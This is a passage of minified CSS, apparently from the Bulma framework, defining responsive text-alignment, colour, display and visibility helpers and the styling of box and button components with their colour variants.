(min-width:769px),print{.has-text-justified-tablet{text-align:justify!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-justified-tablet-only{text-align:justify!important}}@media screen and (max-width:1023px){.has-text-justified-touch{text-align:justify!important}}@media screen and (min-width:1024px){.has-text-justified-desktop{text-align:justify!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-justified-desktop-only{text-align:justify!important}}@media screen and (min-width:1216px){.has-text-justified-widescreen{text-align:justify!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-justified-widescreen-only{text-align:justify!important}}@media screen and (min-width:1408px){.has-text-justified-fullhd{text-align:justify!important}}@media screen and (max-width:768px){.has-text-left-mobile{text-align:left!important}}@media screen and (min-width:769px),print{.has-text-left-tablet{text-align:left!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-left-tablet-only{text-align:left!important}}@media screen and (max-width:1023px){.has-text-left-touch{text-align:left!important}}@media screen and (min-width:1024px){.has-text-left-desktop{text-align:left!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-left-desktop-only{text-align:left!important}}@media screen and (min-width:1216px){.has-text-left-widescreen{text-align:left!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-left-widescreen-only{text-align:left!important}}@media screen and (min-width:1408px){.has-text-left-fullhd{text-align:left!important}}@media screen and (max-width:768px){.has-text-right-mobile{text-align:right!important}}@media screen and (min-width:769px),print{.has-text-right-tablet{text-align:right!important}}@media screen and (min-width:769px) and 
(max-width:1023px){.has-text-right-tablet-only{text-align:right!important}}@media screen and (max-width:1023px){.has-text-right-touch{text-align:right!important}}@media screen and (min-width:1024px){.has-text-right-desktop{text-align:right!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-right-desktop-only{text-align:right!important}}@media screen and (min-width:1216px){.has-text-right-widescreen{text-align:right!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-right-widescreen-only{text-align:right!important}}@media screen and (min-width:1408px){.has-text-right-fullhd{text-align:right!important}}
/* Text-transform / font-style helpers, then .has-text-* / .has-background-* color helpers
   (anchor variants darken on :focus/:hover), font-weight helpers, and .is-family-* font-stack helpers. */
.is-capitalized{text-transform:capitalize!important}.is-lowercase{text-transform:lowercase!important}.is-uppercase{text-transform:uppercase!important}.is-italic{font-style:italic!important}.has-text-white{color:#fff!important}a.has-text-white:focus,a.has-text-white:hover{color:#e6e6e6!important}.has-background-white{background-color:#fff!important}.has-text-black{color:#0a0a0a!important}a.has-text-black:focus,a.has-text-black:hover{color:#000!important}.has-background-black{background-color:#0a0a0a!important}.has-text-light{color:#f5f5f5!important}a.has-text-light:focus,a.has-text-light:hover{color:#dbdbdb!important}.has-background-light{background-color:#f5f5f5!important}.has-text-dark{color:#363636!important}a.has-text-dark:focus,a.has-text-dark:hover{color:#1c1c1c!important}.has-background-dark{background-color:#363636!important}.has-text-primary{color:#00d1b2!important}a.has-text-primary:focus,a.has-text-primary:hover{color:#009e86!important}.has-background-primary{background-color:#00d1b2!important}.has-text-link{color:#3273dc!important}a.has-text-link:focus,a.has-text-link:hover{color:#205bbc!important}.has-background-link{background-color:#3273dc!important}.has-text-info{color:#3298dc!important}a.has-text-info:focus,a.has-text-info:hover{color:#207dbc!important}.has-background-info{background-color:#3298
dc!important}.has-text-success{color:#48c774!important}a.has-text-success:focus,a.has-text-success:hover{color:#34a85c!important}.has-background-success{background-color:#48c774!important}.has-text-warning{color:#ffdd57!important}a.has-text-warning:focus,a.has-text-warning:hover{color:#ffd324!important}.has-background-warning{background-color:#ffdd57!important}.has-text-danger{color:#f14668!important}a.has-text-danger:focus,a.has-text-danger:hover{color:#ee1742!important}.has-background-danger{background-color:#f14668!important}.has-text-black-bis{color:#121212!important}.has-background-black-bis{background-color:#121212!important}.has-text-black-ter{color:#242424!important}.has-background-black-ter{background-color:#242424!important}.has-text-grey-darker{color:#363636!important}.has-background-grey-darker{background-color:#363636!important}.has-text-grey-dark{color:#4a4a4a!important}.has-background-grey-dark{background-color:#4a4a4a!important}.has-text-grey{color:#7a7a7a!important}.has-background-grey{background-color:#7a7a7a!important}.has-text-grey-light{color:#b5b5b5!important}.has-background-grey-light{background-color:#b5b5b5!important}.has-text-grey-lighter{color:#dbdbdb!important}.has-background-grey-lighter{background-color:#dbdbdb!important}.has-text-white-ter{color:#f5f5f5!important}.has-background-white-ter{background-color:#f5f5f5!important}.has-text-white-bis{color:#fafafa!important}.has-background-white-bis{background-color:#fafafa!important}.has-text-weight-light{font-weight:300!important}.has-text-weight-normal{font-weight:400!important}.has-text-weight-medium{font-weight:500!important}.has-text-weight-semibold{font-weight:600!important}.has-text-weight-bold{font-weight:700!important}.is-family-primary{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif!important}.is-family-secondary{font-family:BlinkMacSystemFont,-apple-system,"Segoe 
UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif!important}.is-family-sans-serif{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif!important}.is-family-monospace{font-family:monospace!important}.is-family-code{font-family:monospace!important}
/* Responsive display helpers: .is-block / .is-flex / .is-inline / .is-inline-block / .is-inline-flex,
   each with the same per-breakpoint suffix variants as above. */
.is-block{display:block!important}@media screen and (max-width:768px){.is-block-mobile{display:block!important}}@media screen and (min-width:769px),print{.is-block-tablet{display:block!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-block-tablet-only{display:block!important}}@media screen and (max-width:1023px){.is-block-touch{display:block!important}}@media screen and (min-width:1024px){.is-block-desktop{display:block!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-block-desktop-only{display:block!important}}@media screen and (min-width:1216px){.is-block-widescreen{display:block!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-block-widescreen-only{display:block!important}}@media screen and (min-width:1408px){.is-block-fullhd{display:block!important}}.is-flex{display:flex!important}@media screen and (max-width:768px){.is-flex-mobile{display:flex!important}}@media screen and (min-width:769px),print{.is-flex-tablet{display:flex!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-flex-tablet-only{display:flex!important}}@media screen and (max-width:1023px){.is-flex-touch{display:flex!important}}@media screen and (min-width:1024px){.is-flex-desktop{display:flex!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-flex-desktop-only{display:flex!important}}@media screen and (min-width:1216px){.is-flex-widescreen{display:flex!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-flex-widescreen-only{display:flex!important}}@media 
screen and (min-width:1408px){.is-flex-fullhd{display:flex!important}}.is-inline{display:inline!important}@media screen and (max-width:768px){.is-inline-mobile{display:inline!important}}@media screen and (min-width:769px),print{.is-inline-tablet{display:inline!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-inline-tablet-only{display:inline!important}}@media screen and (max-width:1023px){.is-inline-touch{display:inline!important}}@media screen and (min-width:1024px){.is-inline-desktop{display:inline!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-inline-desktop-only{display:inline!important}}@media screen and (min-width:1216px){.is-inline-widescreen{display:inline!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-inline-widescreen-only{display:inline!important}}@media screen and (min-width:1408px){.is-inline-fullhd{display:inline!important}}.is-inline-block{display:inline-block!important}@media screen and (max-width:768px){.is-inline-block-mobile{display:inline-block!important}}@media screen and (min-width:769px),print{.is-inline-block-tablet{display:inline-block!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-inline-block-tablet-only{display:inline-block!important}}@media screen and (max-width:1023px){.is-inline-block-touch{display:inline-block!important}}@media screen and (min-width:1024px){.is-inline-block-desktop{display:inline-block!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-inline-block-desktop-only{display:inline-block!important}}@media screen and (min-width:1216px){.is-inline-block-widescreen{display:inline-block!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-inline-block-widescreen-only{display:inline-block!important}}@media screen and (min-width:1408px){.is-inline-block-fullhd{display:inline-block!important}}.is-inline-flex{display:inline-flex!important}@media screen and 
(max-width:768px){.is-inline-flex-mobile{display:inline-flex!important}}@media screen and (min-width:769px),print{.is-inline-flex-tablet{display:inline-flex!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-inline-flex-tablet-only{display:inline-flex!important}}@media screen and (max-width:1023px){.is-inline-flex-touch{display:inline-flex!important}}@media screen and (min-width:1024px){.is-inline-flex-desktop{display:inline-flex!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-inline-flex-desktop-only{display:inline-flex!important}}@media screen and (min-width:1216px){.is-inline-flex-widescreen{display:inline-flex!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-inline-flex-widescreen-only{display:inline-flex!important}}@media screen and (min-width:1408px){.is-inline-flex-fullhd{display:inline-flex!important}}
/* Visibility helpers: .is-hidden (display:none), .is-sr-only (visually hidden but readable by screen
   readers), .is-invisible (visibility:hidden) — with the same responsive variants. */
.is-hidden{display:none!important}.is-sr-only{border:none!important;clip:rect(0,0,0,0)!important;height:.01em!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:.01em!important}@media screen and (max-width:768px){.is-hidden-mobile{display:none!important}}@media screen and (min-width:769px),print{.is-hidden-tablet{display:none!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-hidden-tablet-only{display:none!important}}@media screen and (max-width:1023px){.is-hidden-touch{display:none!important}}@media screen and (min-width:1024px){.is-hidden-desktop{display:none!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-hidden-desktop-only{display:none!important}}@media screen and (min-width:1216px){.is-hidden-widescreen{display:none!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-hidden-widescreen-only{display:none!important}}@media screen and (min-width:1408px){.is-hidden-fullhd{display:none!important}}.is-invisible{visibility:hidden!important}@media 
screen and (max-width:768px){.is-invisible-mobile{visibility:hidden!important}}@media screen and (min-width:769px),print{.is-invisible-tablet{visibility:hidden!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-invisible-tablet-only{visibility:hidden!important}}@media screen and (max-width:1023px){.is-invisible-touch{visibility:hidden!important}}@media screen and (min-width:1024px){.is-invisible-desktop{visibility:hidden!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-invisible-desktop-only{visibility:hidden!important}}@media screen and (min-width:1216px){.is-invisible-widescreen{visibility:hidden!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-invisible-widescreen-only{visibility:hidden!important}}@media screen and (min-width:1408px){.is-invisible-fullhd{visibility:hidden!important}}
/* Reset helpers: zero out margin / padding / border-radius / box-shadow; .is-relative positioning helper. */
.is-marginless{margin:0!important}.is-paddingless{padding:0!important}.is-radiusless{border-radius:0!important}.is-shadowless{box-shadow:none!important}.is-relative{position:relative!important}
/* .box component: white card with rounded corners and a soft shadow; link boxes get a focus/hover/active ring. */
.box{background-color:#fff;border-radius:6px;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.02);color:#4a4a4a;display:block;padding:1.25rem}a.box:focus,a.box:hover{box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px #3273dc}a.box:active{box-shadow:inset 0 1px 2px rgba(10,10,10,.2),0 0 0 1px #3273dc}
/* .button component: base appearance, icon spacing, and interaction states (hover/focus/active, .is-text). */
.button{background-color:#fff;border-color:#dbdbdb;border-width:1px;color:#363636;cursor:pointer;justify-content:center;padding-bottom:calc(.5em - 1px);padding-left:1em;padding-right:1em;padding-top:calc(.5em - 1px);text-align:center;white-space:nowrap}.button strong{color:inherit}.button .icon,.button .icon.is-large,.button .icon.is-medium,.button .icon.is-small{height:1.5em;width:1.5em}.button .icon:first-child:not(:last-child){margin-left:calc(-.5em - 1px);margin-right:.25em}.button .icon:last-child:not(:first-child){margin-left:.25em;margin-right:calc(-.5em - 1px)}.button 
.icon:first-child:last-child{margin-left:calc(-.5em - 1px);margin-right:calc(-.5em - 1px)}.button.is-hovered,.button:hover{border-color:#b5b5b5;color:#363636}.button.is-focused,.button:focus{border-color:#3273dc;color:#363636}.button.is-focused:not(:active),.button:focus:not(:active){box-shadow:0 0 0 .125em rgba(50,115,220,.25)}.button.is-active,.button:active{border-color:#4a4a4a;color:#363636}.button.is-text{background-color:transparent;border-color:transparent;color:#4a4a4a;text-decoration:underline}.button.is-text.is-focused,.button.is-text.is-hovered,.button.is-text:focus,.button.is-text:hover{background-color:#f5f5f5;color:#363636}.button.is-text.is-active,.button.is-text:active{background-color:#e8e8e8;color:#363636}.button.is-text[disabled],fieldset[disabled] .button.is-text{background-color:transparent;border-color:transparent;box-shadow:none}
/* .button color variants (.is-white, .is-black, .is-light, .is-dark, .is-primary, .is-link, .is-info, ...):
   each variant repeats the same state matrix — base, hovered, focused (ring), active, disabled,
   .is-inverted, .is-outlined, .is-inverted.is-outlined, and .is-loading::after spinner border colors. */
.button.is-white{background-color:#fff;border-color:transparent;color:#0a0a0a}.button.is-white.is-hovered,.button.is-white:hover{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.button.is-white.is-focused,.button.is-white:focus{border-color:transparent;color:#0a0a0a}.button.is-white.is-focused:not(:active),.button.is-white:focus:not(:active){box-shadow:0 0 0 .125em rgba(255,255,255,.25)}.button.is-white.is-active,.button.is-white:active{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.button.is-white[disabled],fieldset[disabled] .button.is-white{background-color:#fff;border-color:transparent;box-shadow:none}.button.is-white.is-inverted{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted.is-hovered,.button.is-white.is-inverted:hover{background-color:#000}.button.is-white.is-inverted[disabled],fieldset[disabled] .button.is-white.is-inverted{background-color:#0a0a0a;border-color:transparent;box-shadow:none;color:#fff}.button.is-white.is-loading::after{border-color:transparent transparent #0a0a0a 
#0a0a0a!important}.button.is-white.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-white.is-outlined.is-focused,.button.is-white.is-outlined.is-hovered,.button.is-white.is-outlined:focus,.button.is-white.is-outlined:hover{background-color:#fff;border-color:#fff;color:#0a0a0a}.button.is-white.is-outlined.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-white.is-outlined.is-loading.is-focused::after,.button.is-white.is-outlined.is-loading.is-hovered::after,.button.is-white.is-outlined.is-loading:focus::after,.button.is-white.is-outlined.is-loading:hover::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined[disabled],fieldset[disabled] .button.is-white.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-white.is-inverted.is-outlined.is-focused,.button.is-white.is-inverted.is-outlined.is-hovered,.button.is-white.is-inverted.is-outlined:focus,.button.is-white.is-inverted.is-outlined:hover{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-white.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-white.is-inverted.is-outlined.is-loading:focus::after,.button.is-white.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-white.is-inverted.is-outlined[disabled],fieldset[disabled] 
.button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black{background-color:#0a0a0a;border-color:transparent;color:#fff}.button.is-black.is-hovered,.button.is-black:hover{background-color:#040404;border-color:transparent;color:#fff}.button.is-black.is-focused,.button.is-black:focus{border-color:transparent;color:#fff}.button.is-black.is-focused:not(:active),.button.is-black:focus:not(:active){box-shadow:0 0 0 .125em rgba(10,10,10,.25)}.button.is-black.is-active,.button.is-black:active{background-color:#000;border-color:transparent;color:#fff}.button.is-black[disabled],fieldset[disabled] .button.is-black{background-color:#0a0a0a;border-color:transparent;box-shadow:none}.button.is-black.is-inverted{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted.is-hovered,.button.is-black.is-inverted:hover{background-color:#f2f2f2}.button.is-black.is-inverted[disabled],fieldset[disabled] .button.is-black.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#0a0a0a}.button.is-black.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-black.is-outlined.is-focused,.button.is-black.is-outlined.is-hovered,.button.is-black.is-outlined:focus,.button.is-black.is-outlined:hover{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.button.is-black.is-outlined.is-loading::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-outlined.is-loading.is-focused::after,.button.is-black.is-outlined.is-loading.is-hovered::after,.button.is-black.is-outlined.is-loading:focus::after,.button.is-black.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-black.is-outlined[disabled],fieldset[disabled] 
.button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-black.is-inverted.is-outlined.is-focused,.button.is-black.is-inverted.is-outlined.is-hovered,.button.is-black.is-inverted.is-outlined:focus,.button.is-black.is-inverted.is-outlined:hover{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-black.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-black.is-inverted.is-outlined.is-loading:focus::after,.button.is-black.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-light{background-color:#f5f5f5;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light.is-hovered,.button.is-light:hover{background-color:#eee;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light.is-focused,.button.is-light:focus{border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light.is-focused:not(:active),.button.is-light:focus:not(:active){box-shadow:0 0 0 .125em rgba(245,245,245,.25)}.button.is-light.is-active,.button.is-light:active{background-color:#e8e8e8;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light[disabled],fieldset[disabled] .button.is-light{background-color:#f5f5f5;border-color:transparent;box-shadow:none}.button.is-light.is-inverted{background-color:rgba(0,0,0,.7);color:#f5f5f5}.button.is-light.is-inverted.is-hovered,.button.is-light.is-inverted:hover{background-color:rgba(0,0,0,.7)}.button.is-light.is-inverted[disabled],fieldset[disabled] 
.button.is-light.is-inverted{background-color:rgba(0,0,0,.7);border-color:transparent;box-shadow:none;color:#f5f5f5}.button.is-light.is-loading::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;color:#f5f5f5}.button.is-light.is-outlined.is-focused,.button.is-light.is-outlined.is-hovered,.button.is-light.is-outlined:focus,.button.is-light.is-outlined:hover{background-color:#f5f5f5;border-color:#f5f5f5;color:rgba(0,0,0,.7)}.button.is-light.is-outlined.is-loading::after{border-color:transparent transparent #f5f5f5 #f5f5f5!important}.button.is-light.is-outlined.is-loading.is-focused::after,.button.is-light.is-outlined.is-loading.is-hovered::after,.button.is-light.is-outlined.is-loading:focus::after,.button.is-light.is-outlined.is-loading:hover::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined[disabled],fieldset[disabled] .button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;box-shadow:none;color:#f5f5f5}.button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);color:rgba(0,0,0,.7)}.button.is-light.is-inverted.is-outlined.is-focused,.button.is-light.is-inverted.is-outlined.is-hovered,.button.is-light.is-inverted.is-outlined:focus,.button.is-light.is-inverted.is-outlined:hover{background-color:rgba(0,0,0,.7);color:#f5f5f5}.button.is-light.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-light.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-light.is-inverted.is-outlined.is-loading:focus::after,.button.is-light.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #f5f5f5 #f5f5f5!important}.button.is-light.is-inverted.is-outlined[disabled],fieldset[disabled] 
.button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);box-shadow:none;color:rgba(0,0,0,.7)}.button.is-dark{background-color:#363636;border-color:transparent;color:#fff}.button.is-dark.is-hovered,.button.is-dark:hover{background-color:#2f2f2f;border-color:transparent;color:#fff}.button.is-dark.is-focused,.button.is-dark:focus{border-color:transparent;color:#fff}.button.is-dark.is-focused:not(:active),.button.is-dark:focus:not(:active){box-shadow:0 0 0 .125em rgba(54,54,54,.25)}.button.is-dark.is-active,.button.is-dark:active{background-color:#292929;border-color:transparent;color:#fff}.button.is-dark[disabled],fieldset[disabled] .button.is-dark{background-color:#363636;border-color:transparent;box-shadow:none}.button.is-dark.is-inverted{background-color:#fff;color:#363636}.button.is-dark.is-inverted.is-hovered,.button.is-dark.is-inverted:hover{background-color:#f2f2f2}.button.is-dark.is-inverted[disabled],fieldset[disabled] .button.is-dark.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#363636}.button.is-dark.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined{background-color:transparent;border-color:#363636;color:#363636}.button.is-dark.is-outlined.is-focused,.button.is-dark.is-outlined.is-hovered,.button.is-dark.is-outlined:focus,.button.is-dark.is-outlined:hover{background-color:#363636;border-color:#363636;color:#fff}.button.is-dark.is-outlined.is-loading::after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-outlined.is-loading.is-focused::after,.button.is-dark.is-outlined.is-loading.is-hovered::after,.button.is-dark.is-outlined.is-loading:focus::after,.button.is-dark.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined[disabled],fieldset[disabled] 
.button.is-dark.is-outlined{background-color:transparent;border-color:#363636;box-shadow:none;color:#363636}.button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-dark.is-inverted.is-outlined.is-focused,.button.is-dark.is-inverted.is-outlined.is-hovered,.button.is-dark.is-inverted.is-outlined:focus,.button.is-dark.is-inverted.is-outlined:hover{background-color:#fff;color:#363636}.button.is-dark.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-dark.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-dark.is-inverted.is-outlined.is-loading:focus::after,.button.is-dark.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary{background-color:#00d1b2;border-color:transparent;color:#fff}.button.is-primary.is-hovered,.button.is-primary:hover{background-color:#00c4a7;border-color:transparent;color:#fff}.button.is-primary.is-focused,.button.is-primary:focus{border-color:transparent;color:#fff}.button.is-primary.is-focused:not(:active),.button.is-primary:focus:not(:active){box-shadow:0 0 0 .125em rgba(0,209,178,.25)}.button.is-primary.is-active,.button.is-primary:active{background-color:#00b89c;border-color:transparent;color:#fff}.button.is-primary[disabled],fieldset[disabled] .button.is-primary{background-color:#00d1b2;border-color:transparent;box-shadow:none}.button.is-primary.is-inverted{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted.is-hovered,.button.is-primary.is-inverted:hover{background-color:#f2f2f2}.button.is-primary.is-inverted[disabled],fieldset[disabled] 
.button.is-primary.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#00d1b2}.button.is-primary.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;color:#00d1b2}.button.is-primary.is-outlined.is-focused,.button.is-primary.is-outlined.is-hovered,.button.is-primary.is-outlined:focus,.button.is-primary.is-outlined:hover{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.button.is-primary.is-outlined.is-loading::after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-outlined.is-loading.is-focused::after,.button.is-primary.is-outlined.is-loading.is-hovered::after,.button.is-primary.is-outlined.is-loading:focus::after,.button.is-primary.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;box-shadow:none;color:#00d1b2}.button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-primary.is-inverted.is-outlined.is-focused,.button.is-primary.is-inverted.is-outlined.is-hovered,.button.is-primary.is-inverted.is-outlined:focus,.button.is-primary.is-inverted.is-outlined:hover{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-primary.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-primary.is-inverted.is-outlined.is-loading:focus::after,.button.is-primary.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-inverted.is-outlined[disabled],fieldset[disabled] 
.button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary.is-light{background-color:#ebfffc;color:#00947e}.button.is-primary.is-light.is-hovered,.button.is-primary.is-light:hover{background-color:#defffa;border-color:transparent;color:#00947e}.button.is-primary.is-light.is-active,.button.is-primary.is-light:active{background-color:#d1fff8;border-color:transparent;color:#00947e}.button.is-link{background-color:#3273dc;border-color:transparent;color:#fff}.button.is-link.is-hovered,.button.is-link:hover{background-color:#276cda;border-color:transparent;color:#fff}.button.is-link.is-focused,.button.is-link:focus{border-color:transparent;color:#fff}.button.is-link.is-focused:not(:active),.button.is-link:focus:not(:active){box-shadow:0 0 0 .125em rgba(50,115,220,.25)}.button.is-link.is-active,.button.is-link:active{background-color:#2366d1;border-color:transparent;color:#fff}.button.is-link[disabled],fieldset[disabled] .button.is-link{background-color:#3273dc;border-color:transparent;box-shadow:none}.button.is-link.is-inverted{background-color:#fff;color:#3273dc}.button.is-link.is-inverted.is-hovered,.button.is-link.is-inverted:hover{background-color:#f2f2f2}.button.is-link.is-inverted[disabled],fieldset[disabled] .button.is-link.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#3273dc}.button.is-link.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined{background-color:transparent;border-color:#3273dc;color:#3273dc}.button.is-link.is-outlined.is-focused,.button.is-link.is-outlined.is-hovered,.button.is-link.is-outlined:focus,.button.is-link.is-outlined:hover{background-color:#3273dc;border-color:#3273dc;color:#fff}.button.is-link.is-outlined.is-loading::after{border-color:transparent transparent #3273dc 
#3273dc!important}.button.is-link.is-outlined.is-loading.is-focused::after,.button.is-link.is-outlined.is-loading.is-hovered::after,.button.is-link.is-outlined.is-loading:focus::after,.button.is-link.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined[disabled],fieldset[disabled] .button.is-link.is-outlined{background-color:transparent;border-color:#3273dc;box-shadow:none;color:#3273dc}.button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-link.is-inverted.is-outlined.is-focused,.button.is-link.is-inverted.is-outlined.is-hovered,.button.is-link.is-inverted.is-outlined:focus,.button.is-link.is-inverted.is-outlined:hover{background-color:#fff;color:#3273dc}.button.is-link.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-link.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-link.is-inverted.is-outlined.is-loading:focus::after,.button.is-link.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #3273dc #3273dc!important}.button.is-link.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-link.is-light{background-color:#eef3fc;color:#2160c4}.button.is-link.is-light.is-hovered,.button.is-link.is-light:hover{background-color:#e3ecfa;border-color:transparent;color:#2160c4}.button.is-link.is-light.is-active,.button.is-link.is-light:active{background-color:#d8e4f8;border-color:transparent;color:#2160c4}.button.is-info{background-color:#3298dc;border-color:transparent;color:#fff}.button.is-info.is-hovered,.button.is-info:hover{background-color:#2793da;border-color:transparent;color:#fff}.button.is-info.is-focused,.button.is-info:focus{border-color:transparent;color:#fff}.button.is-info.is-focused:not(:active),.button.is-info:focus:not(:active){box-shadow:0 0 0 .125em 
